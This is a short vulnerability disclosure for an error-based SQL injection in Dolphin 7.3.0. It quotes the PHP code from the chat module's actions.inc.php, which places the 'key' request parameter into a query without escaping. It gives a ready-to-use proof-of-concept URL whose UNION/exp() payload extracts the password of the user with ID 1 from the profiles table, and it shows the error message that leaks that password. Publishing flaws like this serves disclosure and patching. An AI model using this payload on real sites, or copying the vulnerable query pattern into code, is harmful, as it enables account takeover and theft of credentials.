Dolphin 7.3.0 Error Based SQL Injection

Homepage:

https://www.boonex.com/

Description:

$_REQUEST['key'] is not escaped.

File: flash\modules\chat\inc\actions.inc.php

$sKey = isset($_REQUEST['key']) ? $_REQUEST['key'] : "";
$sValue = isset($_REQUEST['value']) ? $_REQUEST['value'] : "";
$aKeys = getArray("SELECT `keys`.`ID` AS `KeyID`, `values`.`ID` AS `ValueID` FROM `" . MODULE_DB_PREFIX . "MembershipsSettings` AS `keys` LEFT JOIN `" . MODULE_DB_PREFIX . "Memberships` AS `values` ON `keys`.`ID`=`values`.`Setting` AND `values`.`Membership`='" . $sId . "' WHERE `keys`.`Name`='" . $sKey . "' LIMIT 1");

Proof of Concept:

For getting password user id=1:

http://dolphin/flash/XML.php?module=chat&action=RayzSetMembershipSetting&id=1&_t=41920&key=' UNION select 1, exp(~(select*from(SELECT Password FROM profiles WHERE ID=1)x)); -- a

which is rendered as:

Database access error. Description: DOUBLE value is out of range in 'exp(~((select '%password_here%' from dual)))'<?xml version='1.0' encoding='UTF-8'?><ray><result value="Error saving setting." status="failed" /></ray>

Timeline: